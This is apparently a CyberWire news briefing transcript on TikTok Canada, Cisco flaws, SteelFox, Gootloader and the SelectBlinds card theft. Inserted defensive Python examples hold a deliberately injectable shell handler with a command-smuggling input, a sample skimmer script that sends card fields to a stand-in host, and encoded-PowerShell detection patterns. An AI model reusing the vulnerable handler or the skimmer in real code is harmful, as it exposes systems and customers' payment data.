
Canada cuts TikTok ties.
Canada orders ByteDance to shut down local operations. Cisco releases urgent patches for multiple vulnerabilities. SteelFox malware delivers a crypto-miner and info-stealer. North Korean campaigns pursue fake jobs and remote workers. A suspected cyber intrusion disrupts Washington state court systems. Over 200,000 customers of SelectBlinds have their credit card info stolen. Cyber experts encourage Congress to pursue bipartisan readiness studies despite DoD pushback. On our Industry Voices segment, we welcome guest Jeremy Huval, Chief Innovation Officer at HITRUST®, discussing the AI explosion and the need to consider the risks before implementation. Curiosity killed the cat lover’s computer.
Today is Thursday, November 7th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.
Canada orders ByteDance to shut down local operations.
Canada has ordered ByteDance, the owner of TikTok, to close its Canadian subsidiary, TikTok Technology Canada, Inc., which will result in shutting down offices in Toronto and Vancouver. Announced on November 6 by François-Philippe Champagne, Canada’s Minister of Innovation, Science, and Industry, the decision follows a national security review under the Investment Canada Act, aimed at mitigating risks from foreign investments. The Canadian government cited concerns over potential security threats tied to ByteDance’s connections with the Chinese government. Despite the subsidiary’s closure, the TikTok app remains accessible in Canada, with the government encouraging users to adopt strong cybersecurity practices. ByteDance criticized the decision, saying it would impact hundreds of Canadian jobs and announced plans to challenge the order in court. This move aligns with similar actions by the U.S. and EU, which have restricted TikTok over national security concerns.
Cisco releases urgent patches for multiple vulnerabilities.
Cisco released patches for multiple vulnerabilities in its enterprise products, including a critical flaw (CVE-2024-20418) in its Unified Industrial Wireless software, scoring a perfect 10/10 on the CVSS scale. This vulnerability allows unauthenticated attackers to inject commands with root access via the web-based management interface on affected devices, including the Catalyst IW9165D, IW9165E, and IW9167E access points. Users are advised to update to version 17.15.1 to mitigate the risk.
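The advisory describes the classic shape of a command-injection bug in a web management interface: input from the web UI reaches a shell, and because the daemon runs as root, so does whatever the attacker appends. The following is an added example, not Cisco code and not the vulnerable code path in the Unified Industrial Wireless software; it shows a hypothetical diagnostic handler in its vulnerable and hardened forms. The function names, the `host` parameter and the allowlist regex are assumptions, and `echo` stands in for the real command so the example runs offline.

```python
"""Added example (not Cisco code): OS command injection through a
web-management handler, shown as a vulnerable form and a hardened form.

The diagnostic runs a shell command that echoes a "pinging" line instead
of actually pinging, so it runs offline; the injection mechanics are the
same. Function names and the 'host' parameter are hypothetical.
"""
import re
import subprocess

# Allowlist for hostnames / IPv4 literals: letters, digits, dots, hyphens.
# Anything the shell could interpret (; | & $ ` whitespace, newline) fails.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def vulnerable_diagnostic(host: str) -> str:
    """Vulnerable: user input is pasted into a shell command string.

    With shell=True a value such as '127.0.0.1; id' becomes two commands,
    and both run with the management daemon's privileges (root, in the
    case described in the advisory).
    """
    cmd = f"echo pinging {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_without_validation(host: str) -> str:
    """Half-fix: no shell, but no validation either.

    execve() receives the argv list directly, so ';' is just a character in
    one argument and no second command runs. Validation is still needed to
    stop argument injection against the real tool (e.g. a leading '-').
    """
    return subprocess.run(["echo", "pinging", host], capture_output=True, text=True).stdout


def hardened_diagnostic(host: str) -> str:
    """Hardened: allowlist validation, then exec without a shell."""
    if not _HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    argv = ["echo", "pinging", host]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def demo() -> dict:
    """Run all three handlers against an injection payload and a clean value."""
    payload = "127.0.0.1; echo INJECTED"
    results = {
        "vulnerable": vulnerable_diagnostic(payload),
        "argv_only": argv_without_validation(payload),
    }
    try:
        hardened_diagnostic(payload)
        results["hardened"] = "ACCEPTED"
    except ValueError as exc:
        results["hardened"] = f"rejected: {exc}"
    results["hardened_valid"] = hardened_diagnostic("127.0.0.1")
    return results


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out.strip()!r}")
```

The vulnerable handler's output contains a second line, `INJECTED`, because `/bin/sh` split the string at the semicolon; the argv-only handler echoes the whole payload as one argument; the hardened handler refuses it before anything executes. Running the management service as an unprivileged user, so that an injected command is not already root, is the second half of the fix that patching alone does not supply.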
Additionally, Cisco fixed a high-severity bug (CVE-2024-20536) in the Nexus Dashboard Fabric Controller, which could be exploited for SQL injection, and another high-severity flaw (CVE-2024-20484) in Enterprise Chat and Email that could lead to denial-of-service (DoS). Cisco addressed nearly two dozen other medium-severity issues, affirming that none of the vulnerabilities have been exploited in the wild.
Cisco has also identified a vulnerability (CVE-2024-20445) in its Desk Phone 9800, IP Phone 7800 and 8800, and Video Phone 8875 series that could allow remote attackers to access sensitive data like call records if the Web Access feature is enabled. This flaw, due to improper handling of sensitive information in the web UI, can be exploited by browsing the device’s IP address. Although Web Access is off by default, Cisco has issued patches to secure affected devices and advises users to apply updates promptly.
SteelFox malware delivers a crypto-miner and info-stealer.
The malware bundle “SteelFox” has been impersonating legitimate software, like Foxit PDF Editor and AutoCAD, to steal user information since early 2023. Distributed through torrents, forums, and blogs, SteelFox delivers both a cryptocurrency miner and an information-stealing component. It installs via fake “cracks” of popular software, requesting administrator privileges during installation to later exploit them for malicious purposes. SteelFox uses a vulnerable driver to escalate its privileges, making its processes hard to terminate. The malware collects extensive user data, including browser history, cookies, location, and system details, packaging it in a JSON file and sending it to a command-and-control server. Kaspersky reports victims worldwide and advises users to download software only from official sources and use robust security measures to avoid similar threats.
North Korean campaigns pursue fake jobs and remote workers.
Hackers are increasingly targeting remote workers, often using tactics like “vishing” to impersonate IT staff and steal sensitive information. Recently, Zscaler uncovered two North Korean campaigns, “Contagious Interview” and “WageMole,” aimed at bypassing financial sanctions by securing remote jobs under false identities. The Contagious Interview campaign lures developers with fake job postings, infecting them with the JavaScript-based malware BeaverTail and the Python-based InvisibleFerret, which exfiltrates data over encrypted HTTP. This malware targets developers on Windows, Linux, and macOS, affecting victims primarily in India, Pakistan, Kenya, and Nigeria.
Stolen identities from these attacks fuel the WageMole campaign, allowing operatives to land remote jobs in Western firms. These operatives use AI-generated documents, portfolios, and even voice-over tools to pass interviews, impersonating experienced developers. Zscaler advises companies to verify employment history, use virtual environments for suspicious files, and authenticate applicant identities to combat these tactics.
A suspected cyber intrusion disrupts Washington state court systems.
A suspected cyber intrusion has disrupted Washington state court systems this week, affecting multiple counties, including King, Pierce, and Thurston. The Washington State Administrative Office of the Courts (AOC) detected “unauthorized activity” on its network, leading to outages in public access to court services. While Pierce County reports minimal impact, some courts have suspended hearings and experienced issues with electronic filing and fine payment platforms. The AOC is working to secure systems and restore service but has not confirmed whether ransomware is involved. This incident follows a wave of cyberattacks on various U.S. court systems and other Washington state entities.
Over 200,000 customers of SelectBlinds have their credit card info stolen.
Hackers stole credit card and personal data from over 200,000 customers of home decor retailer SelectBlinds by embedding malware on the company’s website, allowing them to scrape data entered on the checkout page. Discovered in late September, the malware had been active since January, capturing usernames, passwords, credit card details, names, addresses, and emails. SelectBlinds has locked user accounts, requiring password changes, and removed the malware. The company advised customers to update reused passwords on other sites.
This attack is part of a broader trend where hackers use “e-skimmers” to inject malicious code into online checkout pages to siphon credit card data for sale on dark web markets.
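An e-skimmer of the kind described here needs three things on the checkout page: a way to get its script in, access to the card fields, and a network sink to carry the data out. The following added example, which is not SelectBlinds code and is not based on the skimmer in this incident, is a static audit that a shop operator could run against its own checkout HTML to surface those footholds. The allowlisted hosts, the payment field names and the sample page are constructed for the example.

```python
"""Added example (not SelectBlinds code): a static audit of a checkout page
for the footholds an e-skimmer relies on.

It flags (1) external scripts from hosts outside an allowlist, (2) external
scripts without Subresource Integrity, and (3) inline scripts that both read
payment fields and contain a network sink. Allowlist, field names and the
sample HTML are assumptions constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}        # assumed first-party hosts
PAYMENT_FIELDS = ("card_number", "cardnumber", "cvv", "expiry")  # assumed form field names
NETWORK_SINKS = [                                             # ways script can exfiltrate
    re.compile(r"\bfetch\s*\("),
    re.compile(r"\bXMLHttpRequest\b"),
    re.compile(r"\bsendBeacon\s*\("),
    re.compile(r"\bnew\s+Image\b"),
    re.compile(r"\.src\s*="),
]


class _ScriptCollector(HTMLParser):
    """Collects every <script> tag as [src, integrity, inline_body]."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)
            self.scripts.append([a.get("src"), a.get("integrity"), ""])
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1][2] += data


def audit_checkout_html(html: str) -> list:
    """Return a list of human-readable findings for the given page HTML."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, integrity, body in parser.scripts:
        if src:
            host = (urlparse(src).hostname or "").lower()
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(f"external script from non-allowlisted host: {src}")
            if not integrity:
                findings.append(f"external script without integrity attribute: {src}")
        else:
            lowered = body.lower()
            reads_payment = any(field in lowered for field in PAYMENT_FIELDS)
            has_sink = any(p.search(body) for p in NETWORK_SINKS)
            if reads_payment and has_sink:
                findings.append("inline script reads payment fields and has a network sink")
    return findings


# Constructed sample: one good script, one unknown third-party tag, and an
# inline handler that copies card fields into an image request.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="payment">
  <input name="card_number"><input name="cvv"><input name="expiry">
</form>
<script src="https://cdn.example/checkout.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://static.analytics-cdn.invalid/tag.js"></script>
<script>
  document.getElementById("payment").addEventListener("submit", function () {
    var f = document.forms.payment;
    var data = f.card_number.value + "|" + f.cvv.value + "|" + f.expiry.value;
    var img = new Image();
    img.src = "https://collect.invalid/p?d=" + encodeURIComponent(btoa(data));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_checkout_html(SAMPLE_CHECKOUT_HTML):
        print("-", finding)
```

Against the sample page the audit reports three findings: the analytics tag is both non-allowlisted and unpinned, and the inline handler matches the read-then-send pattern. A check like this is a snapshot, so it belongs in CI against the deployed page rather than being run once; enforcing the same allowlist at runtime with a Content-Security-Policy (`script-src` for what may load, `connect-src` and `img-src` for where data may go) is what stops a skimmer that arrives after the audit.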
Cyber experts encourage Congress to pursue bipartisan readiness studies despite DoD pushback.
In a time of political division, bipartisan efforts to strengthen U.S. cybersecurity are at risk. Recently, the Defense Department opposed a proposal for an independent study on America’s cyber force readiness, even though this bipartisan initiative has backing across both congressional chambers. In an opinion piece for CyberScoop, cybersecurity experts Colin Ahern, chief cyber officer of the State of New York, Erica Lonergan, assistant professor at Columbia University’s School of International and Public Affairs, and Mark Montgomery, retired rear admiral and senior director of the Center on Cyber and Technology Innovation at the Foundation for Defense of Democracies, emphasize that traditional physical barriers, like oceans, don’t shield the U.S. in cyberspace, where adversaries routinely infiltrate critical infrastructure, deploy malware, and gather sensitive data from government and private networks.
The proposed legislation seeks to evaluate whether the U.S. has the cyber personnel, strategy, and resources necessary to counter growing digital threats. It also explores creating a dedicated “Cyber Force,” similar to the Space Force, focused on recruiting and training cyber specialists. Given that much cyber expertise lies within the private sector, an independent study would explore how a Cyber Force could enhance collaboration between military and civilian sectors, federal and local governments, and public-private partnerships. Such a force could also support a cyber-specific National Guard and Reserve, offering flexibility and knowledge-sharing for high-stakes cyber defense.
The authors contend that the Defense Department’s resistance may stem from concerns about uncovering readiness deficiencies, as recruitment and training for cyber roles remain fragmented across military branches. This bureaucratic divide harms overall readiness, yet institutional interests often resist substantial change. Congress, they argue, should not bow to Defense Department pressure but instead move forward with the study to assess America’s force posture in cyberspace.
With threats escalating globally — including Chinese cyber incursions into U.S. infrastructure, Iranian attacks on water systems, and cyber warfare in Ukraine — the authors stress that the U.S. cannot afford to delay. An independent, transparent assessment would offer unbiased insights into the readiness and potential reforms needed to secure the nation against digital threats.
Coming up on our Industry Voices segment, I speak with HITRUST’s Chief Innovation Officer Jeremy Huval, about the AI explosion and the need to consider the risks before implementation. We’ll be right back.
Welcome back. You can find out more about HITRUST in our show notes.
Curiosity killed the cat lover’s computer.
In a curious case of cyber crooks targeting feline fans, Sophos reports that the Gootloader malware gang—typically laser-focused on high-value targets like banks—has turned its gaze toward an unusual group: Australian fans of Bengal cats. Yes, you heard that right. This infamous malware, known for sneaking onto systems via SEO-poisoned search results, has been spotted targeting folks simply curious about the legality of owning Bengal cats down under.
The story goes like this: Unsuspecting cat enthusiasts, innocently Googling “Are Bengal cats legal in Australia?” are met with booby-trapped search results. Sophos investigators found that clicking the top link led these curious minds straight to a ZIP file harboring Gootloader’s payload. From there, the malware initiates its devious plan, dropping a giant JavaScript file and establishing persistence with PowerShell commands. The endgame? Bringing out the heavy-hitters like Cobalt Strike and ransomware.
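The chain described here, a browser download, a ZIP, a large JavaScript file run by the Windows script host, then PowerShell, leaves a recognisable parent-child trail in process-creation telemetry. The following is an added example, not Sophos code and not derived from the actual Gootloader sample; it runs two detection rules over constructed Sysmon-style process events. The event fields, file names, PIDs and the encoded-command flag are all constructed for the example.

```python
"""Added example (not Sophos code): detecting a Gootloader-style chain in
process-creation events.

Rule 1: wscript.exe / cscript.exe executing a .js file from a user-writable
        location (Downloads, Temp, AppData).
Rule 2: powershell.exe whose parent is a script host; rated high if the
        command line carries an encoded command.
The events below are constructed for the example; field names follow the
usual Sysmon Event ID 1 vocabulary (image, cmdline, pid, ppid).
"""
import json
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata)\\", re.IGNORECASE)
JS_ARG = re.compile(r"\.js\b", re.IGNORECASE)
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)(\s|$)", re.IGNORECASE)


def parse_events(log_text: str) -> list:
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def detect_gootloader_chain(log_text: str) -> list:
    """Return alerts as dicts: rule, severity, pid, and the matching cmdline."""
    events = parse_events(log_text)
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        cmdline = e["cmdline"]
        if name in SCRIPT_HOSTS and JS_ARG.search(cmdline) and USER_WRITABLE.search(cmdline):
            alerts.append({"rule": "script_host_js_from_user_path", "severity": "medium",
                           "pid": e["pid"], "cmdline": cmdline})
        if name == "powershell.exe":
            parent = by_pid.get(e["ppid"])
            parent_name = ntpath.basename(parent["image"]).lower() if parent else ""
            if parent_name in SCRIPT_HOSTS:
                sev = "high" if ENCODED_PS.search(cmdline) else "medium"
                alerts.append({"rule": "powershell_spawned_by_script_host", "severity": sev,
                               "pid": e["pid"], "cmdline": cmdline})
    return alerts


# Constructed telemetry (not from the Sophos report): browser -> explorer
# (ZIP opened) -> wscript on a .js in Downloads -> hidden encoded PowerShell.
_EVENTS = [
    {"ts": "2024-11-06T09:12:01Z", "pid": 4120, "ppid": 3300,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": "firefox.exe"},
    {"ts": "2024-11-06T09:12:40Z", "pid": 5204, "ppid": 4120,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"ts": "2024-11-06T09:12:58Z", "pid": 5388, "ppid": 5204,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\are_bengal_cats_legal_in_australia_12345.js"'},
    {"ts": "2024-11-06T09:13:02Z", "pid": 5412, "ppid": 5388,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": "2024-11-06T09:14:10Z", "pid": 5500, "ppid": 5204,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in _EVENTS)

if __name__ == "__main__":
    for alert in detect_gootloader_chain(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['rule']} pid={alert['pid']}: {alert['cmdline']}")
```

On the constructed log the rules fire twice: once for the script host running the `.js` out of Downloads, and once, at high severity, for the encoded PowerShell it spawned; the unrelated notepad process is ignored. If file-create telemetry is available, a size threshold on the dropped `.js` (the report calls it giant) is a cheap third signal, and the same parent-child lookup extends to whatever PowerShell launches next.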
As bizarre as it seems, this cat-loving cyber caper reminds us just how far cybercriminals will go—and how important it is to think twice before downloading anything from that “helpful” forum post. It may be the purr-fect crime. I mean, talk about cat-phishing! We’re talking furr-bidden content. And that’s just scratching the surface. Let’s not get hiss-terical. I could do this all day, folks.
And that’s the CyberWire.
For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.
We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.
We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.
N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.
This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.